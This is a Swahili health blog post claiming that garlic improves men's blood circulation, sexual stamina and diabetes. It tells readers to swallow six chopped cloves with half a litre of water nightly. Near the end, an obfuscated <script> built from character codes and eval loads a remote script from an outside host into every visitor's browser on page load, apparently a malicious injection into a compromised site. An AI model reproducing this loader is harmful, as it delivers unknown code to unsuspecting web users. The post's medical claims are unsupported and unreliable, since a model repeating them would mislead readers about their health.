Mara nyingi huaminika kuwa Kitunguu swaumu ni Moja ya kiungo muhimu Sana kwa binadamu huweza tumika chenyewe au Kama kiungo katika chakula. Kiujumla Ni kitu ambacho Ni muhimu kwa watu wore na jinsia yoyote kwakuwa kina virutubisho rafiki kwa ajili ya afya ya mwili wa binadamu, sasa Leo tutatazama umuhimu wa kitunguu swaumu kwa wanaume.
Huzalisha Allicin, ambayo inasaidia mzunguko wa damu kuwa vizuri kwenye viungo vya uzazi. Kuwa na mzunguko mzuri wa damu kwenye viungo vya mwanaume ni sababu kubwa ya kuongeza stamina katika tendo.
kitunguu swaumu kina sifa ambazo hukifanya kuwa na faida nyingi mwilini kwa kuwa na viasili kadhaa ambavyo hutofautiana kiuwezo.
Baadhi ya viasili huweza kuchochea kutanuka kwa mishipa ya damu ambapo huboresha seli nyekundu za damu.
Vilevile, katika damu kitunguu swaumu hudhibiti kemikali ya homocystine katika mwilini wa binadamu ambapo hupunguza athari za kisukari. Ambapo pia kile kiambato Cha allicin kinaongeza zaidi ubora wa mwanaume na kudumu kwa muda mrefu tendoni.
Jinsi ya kutumia kitunguu swaumu?
A) Andaa kitunguu swaumu kimoja
B) Kibangua katika punje mojamoja
C) Chagua punje 6
D) Uzimenye
E) Zikatekate vipande vidogodogo viache muda kidogo
F) Meza kama unavyomeza dawa na maji kama nusu lita hivi kila unapoenda kulala. Angalizo USITAFUNE
Ili kufanya afya yako kuwa Bora mwanaume, fanya hivi Kila siku
Fahamu Faida za Kitunguu Swaumu Kwa Afya Yako
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments